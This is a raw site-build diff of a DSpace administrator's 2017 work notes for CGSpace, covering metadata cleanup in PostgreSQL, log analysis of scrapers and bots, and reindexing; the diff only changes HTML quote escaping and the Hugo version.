<pre tabindex="0"><code>dspace=# select * from metadatavalue where metadata_field_id=11 and date(text_value) &gt; '2017-05-01T00:00:00Z';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where metadata_field_id=11 and date(text_value) &gt; &#39;2017-05-01T00:00:00Z&#39;;
metadata_value_id | item_id | metadata_field_id | text_value | text_lang | place | authority | confidence
-------------------+---------+-------------------+----------------------+-----------+-------+-----------+------------
123117 | 5872 | 11 | 2017-06-28T13:05:18Z | | 1 | | -1
@ -465,7 +465,7 @@ WHERE {
<li>According to <code>dc.date.accessioned</code> (metadata field id 11) there have only been five items submitted since May</li>
<li>These are their handles:</li>
</ul>
<pre tabindex="0"><code>dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id in (select item_id from metadatavalue where metadata_field_id=11 and date(text_value) &gt; '2017-05-01T00:00:00Z');
<pre tabindex="0"><code>dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id in (select item_id from metadatavalue where metadata_field_id=11 and date(text_value) &gt; &#39;2017-05-01T00:00:00Z&#39;);
handle
------------
10947/4658

View File

@ -32,7 +32,7 @@ Linode sent an alert that CGSpace (linode18) was using 261% CPU for the past two
Ask Sisay to clean up the WLE approvers a bit, as Marianne&rsquo;s user account is both in the approvers step as well as the group
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -130,7 +130,7 @@ Ask Sisay to clean up the WLE approvers a bit, as Marianne&rsquo;s user account
<ul>
<li>Delete 58 blank metadata values from the CGSpace database:</li>
</ul>
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
DELETE 58
</code></pre><ul>
<li>I also ran it on DSpace Test because we&rsquo;ll be migrating the CGIAR Library soon and it would be good to catch these before we migrate</li>
@ -145,7 +145,7 @@ DELETE 58
<li>There will need to be some metadata updatesthough if I recall correctly it is only about seven recordsfor that as well, I had made some notes about it in <a href="/cgspace-notes/2017-07">2017-07</a>, but I&rsquo;ve asked for more clarification from Lili just in case</li>
<li>Looking at the DSpace logs to see if we&rsquo;ve had a change in the &ldquo;Cannot get a connection&rdquo; errors since last month when we adjusted the <code>db.maxconnections</code> parameter on CGSpace:</li>
</ul>
<pre tabindex="0"><code># grep -c &quot;Cannot get a connection, pool error Timeout waiting for idle object&quot; dspace.log.2017-09-*
<pre tabindex="0"><code># grep -c &#34;Cannot get a connection, pool error Timeout waiting for idle object&#34; dspace.log.2017-09-*
dspace.log.2017-09-01:0
dspace.log.2017-09-02:0
dspace.log.2017-09-03:9
@ -174,7 +174,7 @@ dspace.log.2017-09-10:0
<li>The import process takes the same amount of time with and without the caching</li>
<li>Also, I captured TCP packets destined for port 80 and both imports only captured ONE packet (an update check from some component in Java):</li>
</ul>
<pre tabindex="0"><code>$ sudo tcpdump -i en0 -w without-cached-xsd.dump dst port 80 and 'tcp[32:4] = 0x47455420'
<pre tabindex="0"><code>$ sudo tcpdump -i en0 -w without-cached-xsd.dump dst port 80 and &#39;tcp[32:4] = 0x47455420&#39;
</code></pre><ul>
<li>Great TCP dump guide here: <a href="https://danielmiessler.com/study/tcpdump">https://danielmiessler.com/study/tcpdump</a></li>
<li>The last part of that command filters for HTTP GET requests, of which there should have been many to fetch all the XSD files for validation</li>
@ -204,7 +204,7 @@ dspace.log.2017-09-10:0
<li>I wonder what was going on, and looking into the nginx logs I think maybe it&rsquo;s OAI&hellip;</li>
<li>Here is yesterday&rsquo;s top ten IP addresses making requests to <code>/oai</code>:</li>
</ul>
<pre tabindex="0"><code># awk '{print $1}' /var/log/nginx/oai.log | sort -n | uniq -c | sort -h | tail -n 10
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/oai.log | sort -n | uniq -c | sort -h | tail -n 10
1 213.136.89.78
1 66.249.66.90
1 66.249.66.92
@ -217,7 +217,7 @@ dspace.log.2017-09-10:0
</code></pre><ul>
<li>Compared to the previous day&rsquo;s logs it looks VERY high:</li>
</ul>
<pre tabindex="0"><code># awk '{print $1}' /var/log/nginx/oai.log.1 | sort -n | uniq -c | sort -h | tail -n 10
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/oai.log.1 | sort -n | uniq -c | sort -h | tail -n 10
1 207.46.13.39
1 66.249.66.93
2 66.249.66.91
@ -234,9 +234,9 @@ dspace.log.2017-09-10:0
</li>
<li>And this user agent has never been seen before today (or at least recently!):</li>
</ul>
<pre tabindex="0"><code># grep -c &quot;API scraper&quot; /var/log/nginx/oai.log
<pre tabindex="0"><code># grep -c &#34;API scraper&#34; /var/log/nginx/oai.log
62088
# zgrep -c &quot;API scraper&quot; /var/log/nginx/oai.log.*.gz
# zgrep -c &#34;API scraper&#34; /var/log/nginx/oai.log.*.gz
/var/log/nginx/oai.log.10.gz:0
/var/log/nginx/oai.log.11.gz:0
/var/log/nginx/oai.log.12.gz:0
@ -270,7 +270,7 @@ dspace.log.2017-09-10:0
<li>Some of these heavy users are also using XMLUI, and their user agent isn&rsquo;t matched by the <a href="https://github.com/ilri/rmg-ansible-public/blob/master/roles/dspace/templates/tomcat/server-tomcat7.xml.j2#L158">Tomcat Session Crawler valve</a>, so each request uses a different session</li>
<li>Yesterday alone the IP addresses using the <code>API scraper</code> user agent were responsible for 16,000 sessions in XMLUI:</li>
</ul>
<pre tabindex="0"><code># grep -a -E &quot;(54.70.51.7|35.161.215.53|34.211.17.113|54.70.175.86)&quot; /home/cgspace.cgiar.org/log/dspace.log.2017-09-12 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code># grep -a -E &#34;(54.70.51.7|35.161.215.53|34.211.17.113|54.70.175.86)&#34; /home/cgspace.cgiar.org/log/dspace.log.2017-09-12 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
15924
</code></pre><ul>
<li>If this continues I will definitely need to figure out who is responsible for this scraper and add their user agent to the session crawler valve regex</li>
@ -282,7 +282,7 @@ dspace.log.2017-09-10:0
<li>Looking at the spreadsheet with deletions and corrections that CCAFS sent last week</li>
<li>It appears they want to delete a lot of metadata, which I&rsquo;m not sure they realize the implications of:</li>
</ul>
<pre tabindex="0"><code>dspace=# select text_value, count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in ('EA_PAR','FP1_CSAEvidence','FP2_CRMWestAfrica','FP3_Gender','FP4_Baseline','FP4_CCPAG','FP4_CCPG','FP4_CIATLAM IMPACT','FP4_ClimateData','FP4_ClimateModels','FP4_GenderPolicy','FP4_GenderToolbox','FP4_Livestock','FP4_PolicyEngagement','FP_GII','SA_Biodiversity','SA_CSV','SA_GHGMeasurement','SEA_mitigationSAMPLES','SEA_UpscalingInnovation','WA_Partnership','WA_SciencePolicyExchange') group by text_value;
<pre tabindex="0"><code>dspace=# select text_value, count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in (&#39;EA_PAR&#39;,&#39;FP1_CSAEvidence&#39;,&#39;FP2_CRMWestAfrica&#39;,&#39;FP3_Gender&#39;,&#39;FP4_Baseline&#39;,&#39;FP4_CCPAG&#39;,&#39;FP4_CCPG&#39;,&#39;FP4_CIATLAM IMPACT&#39;,&#39;FP4_ClimateData&#39;,&#39;FP4_ClimateModels&#39;,&#39;FP4_GenderPolicy&#39;,&#39;FP4_GenderToolbox&#39;,&#39;FP4_Livestock&#39;,&#39;FP4_PolicyEngagement&#39;,&#39;FP_GII&#39;,&#39;SA_Biodiversity&#39;,&#39;SA_CSV&#39;,&#39;SA_GHGMeasurement&#39;,&#39;SEA_mitigationSAMPLES&#39;,&#39;SEA_UpscalingInnovation&#39;,&#39;WA_Partnership&#39;,&#39;WA_SciencePolicyExchange&#39;) group by text_value;
text_value | count
--------------------------+-------
FP4_ClimateModels | 6
@ -309,18 +309,18 @@ dspace.log.2017-09-10:0
<li>I sent CCAFS people an email to ask if they really want to remove these 200+ tags</li>
<li>She responded yes, so I&rsquo;ll at least need to do these deletes in PostgreSQL:</li>
</ul>
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in ('EA_PAR','FP1_CSAEvidence','FP2_CRMWestAfrica','FP3_Gender','FP4_Baseline','FP4_CCPAG','FP4_CCPG','FP4_CIATLAM IMPACT','FP4_ClimateData','FP4_ClimateModels','FP4_GenderPolicy','FP4_GenderToolbox','FP4_Livestock','FP4_PolicyEngagement','FP_GII','SA_Biodiversity','SA_CSV','SA_GHGMeasurement','SEA_mitigationSAMPLES','SEA_UpscalingInnovation','WA_Partnership','WA_SciencePolicyExchange','FP_GII');
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in (&#39;EA_PAR&#39;,&#39;FP1_CSAEvidence&#39;,&#39;FP2_CRMWestAfrica&#39;,&#39;FP3_Gender&#39;,&#39;FP4_Baseline&#39;,&#39;FP4_CCPAG&#39;,&#39;FP4_CCPG&#39;,&#39;FP4_CIATLAM IMPACT&#39;,&#39;FP4_ClimateData&#39;,&#39;FP4_ClimateModels&#39;,&#39;FP4_GenderPolicy&#39;,&#39;FP4_GenderToolbox&#39;,&#39;FP4_Livestock&#39;,&#39;FP4_PolicyEngagement&#39;,&#39;FP_GII&#39;,&#39;SA_Biodiversity&#39;,&#39;SA_CSV&#39;,&#39;SA_GHGMeasurement&#39;,&#39;SEA_mitigationSAMPLES&#39;,&#39;SEA_UpscalingInnovation&#39;,&#39;WA_Partnership&#39;,&#39;WA_SciencePolicyExchange&#39;,&#39;FP_GII&#39;);
DELETE 207
</code></pre><ul>
<li>When we discussed this in late July there were some other renames they had requested, but I don&rsquo;t see them in the current spreadsheet so I will have to follow that up</li>
<li>I talked to Macaroni Bros and they said to just go ahead with the other corrections as well as their spreadsheet was evolved organically rather than systematically!</li>
<li>The final list of corrections and deletes should therefore be:</li>
</ul>
<pre tabindex="0"><code>delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-FP4_CRMWestAfrica';
update metadatavalue set text_value='FP3_VietnamLED' where resource_type_id=2 and metadata_field_id=134 and text_value='FP3_VeitnamLED';
update metadatavalue set text_value='PII-FP1_PIRCCA' where resource_type_id=2 and metadata_field_id=235 and text_value='PII-SEA_PIRCCA';
delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-WA_IntegratedInterventions';
delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in ('EA_PAR','FP1_CSAEvidence','FP2_CRMWestAfrica','FP3_Gender','FP4_Baseline','FP4_CCPAG','FP4_CCPG','FP4_CIATLAM IMPACT','FP4_ClimateData','FP4_ClimateModels','FP4_GenderPolicy','FP4_GenderToolbox','FP4_Livestock','FP4_PolicyEngagement','FP_GII','SA_Biodiversity','SA_CSV','SA_GHGMeasurement','SEA_mitigationSAMPLES','SEA_UpscalingInnovation','WA_Partnership','WA_SciencePolicyExchange','FP_GII');
<pre tabindex="0"><code>delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value=&#39;PII-FP4_CRMWestAfrica&#39;;
update metadatavalue set text_value=&#39;FP3_VietnamLED&#39; where resource_type_id=2 and metadata_field_id=134 and text_value=&#39;FP3_VeitnamLED&#39;;
update metadatavalue set text_value=&#39;PII-FP1_PIRCCA&#39; where resource_type_id=2 and metadata_field_id=235 and text_value=&#39;PII-SEA_PIRCCA&#39;;
delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value=&#39;PII-WA_IntegratedInterventions&#39;;
delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134, 235) and text_value in (&#39;EA_PAR&#39;,&#39;FP1_CSAEvidence&#39;,&#39;FP2_CRMWestAfrica&#39;,&#39;FP3_Gender&#39;,&#39;FP4_Baseline&#39;,&#39;FP4_CCPAG&#39;,&#39;FP4_CCPG&#39;,&#39;FP4_CIATLAM IMPACT&#39;,&#39;FP4_ClimateData&#39;,&#39;FP4_ClimateModels&#39;,&#39;FP4_GenderPolicy&#39;,&#39;FP4_GenderToolbox&#39;,&#39;FP4_Livestock&#39;,&#39;FP4_PolicyEngagement&#39;,&#39;FP_GII&#39;,&#39;SA_Biodiversity&#39;,&#39;SA_CSV&#39;,&#39;SA_GHGMeasurement&#39;,&#39;SEA_mitigationSAMPLES&#39;,&#39;SEA_UpscalingInnovation&#39;,&#39;WA_Partnership&#39;,&#39;WA_SciencePolicyExchange&#39;,&#39;FP_GII&#39;);
</code></pre><ul>
<li>Create and merge pull request to shut up the Ehcache update check (<a href="https://github.com/ilri/DSpace/pull/337">#337</a>)</li>
<li>Although it looks like there was a previous attempt to disable these update checks that was merged in DSpace 4.0 (although it only affects XMLUI): <a href="https://jira.duraspace.org/browse/DS-1492">https://jira.duraspace.org/browse/DS-1492</a></li>
@ -332,7 +332,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
<li>Testing to see how we end up with all these new authorities after we keep cleaning and merging them in the database</li>
<li>Here are all my distinct authority combinations in the database before:</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Orth, %&#39;;
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad | -1
@ -347,7 +347,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
</code></pre><ul>
<li>And then after adding a new item and selecting an existing &ldquo;Orth, Alan&rdquo; with an ORCID in the author lookup:</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Orth, %&#39;;
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad | -1
@ -363,7 +363,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
</code></pre><ul>
<li>It created a new authority&hellip; let&rsquo;s try to add another item and select the same existing author and see what happens in the database:</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Orth, %&#39;;
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad | -1
@ -379,7 +379,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
</code></pre><ul>
<li>No new one&hellip; so now let me try to add another item and select the italicized result from the ORCID lookup and see what happens in the database:</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Orth, %&#39;;
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad | -1
@ -396,7 +396,7 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id in (134
</code></pre><ul>
<li>Shit, it created another authority! Let&rsquo;s try it again!</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Orth, %';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Orth, %&#39;;
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, Alan | 7c2bffb8-58c9-4bc8-b102-ebe8aec200ad | -1
@ -439,19 +439,19 @@ DELETE 207
<li>We still need to do the changes to <code>config.dct</code> and regenerate the <code>sitebndl.zip</code> to send to the Handle.net admins</li>
<li>According to this <a href="http://dspace.2283337.n4.nabble.com/Multiple-handle-prefixes-merged-DSpace-instances-td3427192.html">dspace-tech mailing list entry from 2011</a>, we need to add the extra handle prefixes to <code>config.dct</code> like this:</li>
</ul>
<pre tabindex="0"><code>&quot;server_admins&quot; = (
&quot;300:0.NA/10568&quot;
&quot;300:0.NA/10947&quot;
<pre tabindex="0"><code>&#34;server_admins&#34; = (
&#34;300:0.NA/10568&#34;
&#34;300:0.NA/10947&#34;
)
&quot;replication_admins&quot; = (
&quot;300:0.NA/10568&quot;
&quot;300:0.NA/10947&quot;
&#34;replication_admins&#34; = (
&#34;300:0.NA/10568&#34;
&#34;300:0.NA/10947&#34;
)
&quot;backup_admins&quot; = (
&quot;300:0.NA/10568&quot;
&quot;300:0.NA/10947&quot;
&#34;backup_admins&#34; = (
&#34;300:0.NA/10568&#34;
&#34;300:0.NA/10947&#34;
)
</code></pre><ul>
<li>More work on the CGIAR Library migration test run locally, as I was having problem with importing the last fourteen items from the CGIAR System Management Office community</li>
@ -494,7 +494,7 @@ DELETE 207
<li>Abenet and I noticed that hdl.handle.net is blocked by ETC at ILRI Addis so I asked Biruk Debebe to route it over the satellite</li>
<li>Force thumbnail regeneration for the CGIAR System Organization&rsquo;s Historic Archive community (2000 items):</li>
</ul>
<pre tabindex="0"><code>$ schedtool -D -e ionice -c2 -n7 nice -n19 dspace filter-media -f -i 10947/1 -p &quot;ImageMagick PDF Thumbnail&quot;
<pre tabindex="0"><code>$ schedtool -D -e ionice -c2 -n7 nice -n19 dspace filter-media -f -i 10947/1 -p &#34;ImageMagick PDF Thumbnail&#34;
</code></pre><ul>
<li>I&rsquo;m still waiting (over 1 day later) to hear back from the CGIAR System Organization about updating the DNS for library.cgiar.org</li>
</ul>
@ -552,7 +552,7 @@ DELETE 207
<li>Communicate (finally) with Tania and Tunji from the CGIAR System Organization office to tell them to request CGNET make the DNS updates for library.cgiar.org</li>
<li>Peter wants me to clean up the text values for Delia Grace&rsquo;s metadata, as the authorities are all messed up again since we cleaned them up in <a href="/cgspace-notes/2016-12">2016-12</a>:</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Grace, D%&#39;;
text_value | authority | confidence
--------------+--------------------------------------+------------
Grace, Delia | | 600
@ -563,12 +563,12 @@ DELETE 207
<li>Strangely, none of her authority entries have ORCIDs anymore&hellip;</li>
<li>I&rsquo;ll just fix the text values and forget about it for now:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value=&#39;Grace, Delia&#39;, authority=&#39;bfa61d7c-7583-4175-991c-2e7315000f0c&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Grace, D%&#39;;
UPDATE 610
</code></pre><ul>
<li>After this we have to reindex the Discovery and Authority cores (as <code>tomcat7</code> user):</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b
real 83m56.895s

View File

@ -34,7 +34,7 @@ http://hdl.handle.net/10568/78495||http://hdl.handle.net/10568/79336
There appears to be a pattern but I&rsquo;ll have to look a bit closer and try to clean them up automatically, either in SQL or in OpenRefine
Add Katherine Lutz to the groups for content submission and edit steps of the CGIAR System collections
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -140,7 +140,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<li>I thought maybe his account had expired (seeing as it&rsquo;s was the first of the month) but he says he was finally able to log in today</li>
<li>The logs for yesterday show fourteen errors related to LDAP auth failures:</li>
</ul>
<pre tabindex="0"><code>$ grep -c &quot;ldap_authentication:type=failed_auth&quot; dspace.log.2017-10-01
<pre tabindex="0"><code>$ grep -c &#34;ldap_authentication:type=failed_auth&#34; dspace.log.2017-10-01
14
</code></pre><ul>
<li>For what it&rsquo;s worth, there are no errors on any other recent days, so it must have been some network issue on Linode or CGNET&rsquo;s LDAP server</li>
@ -165,7 +165,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<li>Twice in the past twenty-four hours Linode has warned that CGSpace&rsquo;s outbound traffic rate was exceeding the notification threshold</li>
<li>I had a look at yesterday&rsquo;s OAI and REST logs in <code>/var/log/nginx</code> but didn&rsquo;t see anything unusual:</li>
</ul>
<pre tabindex="0"><code># awk '{print $1}' /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 10
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 10
141 157.55.39.240
145 40.77.167.85
162 66.249.66.92
@ -176,7 +176,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
1495 50.116.102.77
3904 70.32.83.92
9904 45.5.184.196
# awk '{print $1}' /var/log/nginx/oai.log.1 | sort -n | uniq -c | sort -h | tail -n 10
# awk &#39;{print $1}&#39; /var/log/nginx/oai.log.1 | sort -n | uniq -c | sort -h | tail -n 10
5 66.249.66.71
6 66.249.66.67
6 68.180.229.31
@ -270,14 +270,14 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<li>Annnd I reloaded the Atmire Usage Stats module and the connections shot back up and CGSpace went down again</li>
<li>Still not sure where the load is coming from right now, but it&rsquo;s clear why there were so many alerts yesterday on the 25th!</li>
</ul>
<pre tabindex="0"><code># grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2017-10-25 | sort -n | uniq | wc -l
<pre tabindex="0"><code># grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2017-10-25 | sort -n | uniq | wc -l
18022
</code></pre><ul>
<li>Compared to other days there were two or three times the number of requests yesterday!</li>
</ul>
<pre tabindex="0"><code># grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2017-10-23 | sort -n | uniq | wc -l
<pre tabindex="0"><code># grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2017-10-23 | sort -n | uniq | wc -l
3141
# grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2017-10-26 | sort -n | uniq | wc -l
# grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2017-10-26 | sort -n | uniq | wc -l
7851
</code></pre><ul>
<li>I still have no idea what was causing the load to go up today</li>
@ -302,7 +302,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<li>I&rsquo;m still not sure why this started causing alerts so repeatadely the past week</li>
<li>I don&rsquo;t see any tell tale signs in the REST or OAI logs, so trying to do rudimentary analysis in DSpace logs:</li>
</ul>
<pre tabindex="0"><code># grep '2017-10-29 02:' dspace.log.2017-10-29 | grep -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code># grep &#39;2017-10-29 02:&#39; dspace.log.2017-10-29 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
2049
</code></pre><ul>
<li>So there were 2049 unique sessions during the hour of 2AM</li>
@ -310,7 +310,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<li>I think I&rsquo;ll need to enable access logging in nginx to figure out what&rsquo;s going on</li>
<li>After enabling logging on requests to XMLUI on <code>/</code> I see some new bot I&rsquo;ve never seen before:</li>
</ul>
<pre tabindex="0"><code>137.108.70.6 - - [29/Oct/2017:07:39:49 +0000] &quot;GET /discover?filtertype_0=type&amp;filter_relational_operator_0=equals&amp;filter_0=Internal+Document&amp;filtertype=author&amp;filter_relational_operator=equals&amp;filter=CGIAR+Secretariat HTTP/1.1&quot; 200 7776 &quot;-&quot; &quot;Mozilla/5.0 (compatible; CORE/0.6; +http://core.ac.uk; http://core.ac.uk/intro/contact)&quot;
<pre tabindex="0"><code>137.108.70.6 - - [29/Oct/2017:07:39:49 +0000] &#34;GET /discover?filtertype_0=type&amp;filter_relational_operator_0=equals&amp;filter_0=Internal+Document&amp;filtertype=author&amp;filter_relational_operator=equals&amp;filter=CGIAR+Secretariat HTTP/1.1&#34; 200 7776 &#34;-&#34; &#34;Mozilla/5.0 (compatible; CORE/0.6; +http://core.ac.uk; http://core.ac.uk/intro/contact)&#34;
</code></pre><ul>
<li>CORE seems to be some bot that is &ldquo;Aggregating the worlds open access research papers&rdquo;</li>
<li>The contact address listed in their bot&rsquo;s user agent is incorrect, correct page is simply: <a href="https://core.ac.uk/contact">https://core.ac.uk/contact</a></li>
@ -329,20 +329,20 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
</code></pre><ul>
<li>Surprise surprise, the CORE bot is likely responsible for the recent load issues, making hundreds of thousands of requests yesterday and today:</li>
</ul>
<pre tabindex="0"><code># grep -c &quot;CORE/0.6&quot; /var/log/nginx/access.log
<pre tabindex="0"><code># grep -c &#34;CORE/0.6&#34; /var/log/nginx/access.log
26475
# grep -c &quot;CORE/0.6&quot; /var/log/nginx/access.log.1
# grep -c &#34;CORE/0.6&#34; /var/log/nginx/access.log.1
135083
</code></pre><ul>
<li>IP addresses for this bot currently seem to be:</li>
</ul>
<pre tabindex="0"><code># grep &quot;CORE/0.6&quot; /var/log/nginx/access.log | awk '{print $1}' | sort -n | uniq
<pre tabindex="0"><code># grep &#34;CORE/0.6&#34; /var/log/nginx/access.log | awk &#39;{print $1}&#39; | sort -n | uniq
137.108.70.6
137.108.70.7
</code></pre><ul>
<li>I will add their user agent to the Tomcat Session Crawler Valve but it won&rsquo;t help much because they are only using two sessions:</li>
</ul>
<pre tabindex="0"><code># grep 137.108.70 dspace.log.2017-10-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq
<pre tabindex="0"><code># grep 137.108.70 dspace.log.2017-10-30 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq
session_id=5771742CABA3D0780860B8DA81E0551B
session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
</code></pre><ul>
@ -350,12 +350,12 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
</ul>
<pre tabindex="0"><code># grep -c 137.108.70 /var/log/nginx/access.log
26622
# grep 137.108.70 /var/log/nginx/access.log | grep -c &quot;GET /discover&quot;
# grep 137.108.70 /var/log/nginx/access.log | grep -c &#34;GET /discover&#34;
24055
</code></pre><ul>
<li>Just because I&rsquo;m curious who the top IPs are:</li>
</ul>
<pre tabindex="0"><code># awk '{print $1}' /var/log/nginx/access.log | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/access.log | sort -n | uniq -c | sort -h | tail
496 62.210.247.93
571 46.4.94.226
651 40.77.167.39
@ -371,9 +371,9 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
<li>190.19.92.5 is apparently in Argentina, and 104.196.152.243 is from Google Cloud Engine</li>
<li>Actually, these two scrapers might be more responsible for the heavy load than the CORE bot, because they don&rsquo;t reuse their session variable, creating thousands of new sessions!</li>
</ul>
<pre tabindex="0"><code># grep 190.19.92.5 dspace.log.2017-10-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code># grep 190.19.92.5 dspace.log.2017-10-30 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
1419
# grep 104.196.152.243 dspace.log.2017-10-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
# grep 104.196.152.243 dspace.log.2017-10-30 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
2811
</code></pre><ul>
<li>From looking at the requests, it appears these are from CIAT and CCAFS</li>
@ -382,11 +382,11 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
<li>Ah, wait, it looks like <code>crawlerIps</code> only came in 2017-06, so probably isn&rsquo;t in Ubuntu 16.04&rsquo;s 7.0.68 build!</li>
<li>That would explain the errors I was getting when trying to set it:</li>
</ul>
<pre tabindex="0"><code>WARNING: [SetPropertiesRule]{Server/Service/Engine/Host/Valve} Setting property 'crawlerIps' to '190\.19\.92\.5|104\.196\.152\.243' did not find a matching property.
<pre tabindex="0"><code>WARNING: [SetPropertiesRule]{Server/Service/Engine/Host/Valve} Setting property &#39;crawlerIps&#39; to &#39;190\.19\.92\.5|104\.196\.152\.243&#39; did not find a matching property.
</code></pre><ul>
<li>As for now, it actually seems the CORE bot coming from 137.108.70.6 and 137.108.70.7 is only using a few sessions per day, which is good:</li>
</ul>
<pre tabindex="0"><code># grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=137.108.70.(6|7)' dspace.log.2017-10-30 | sort -n | uniq -c | sort -h
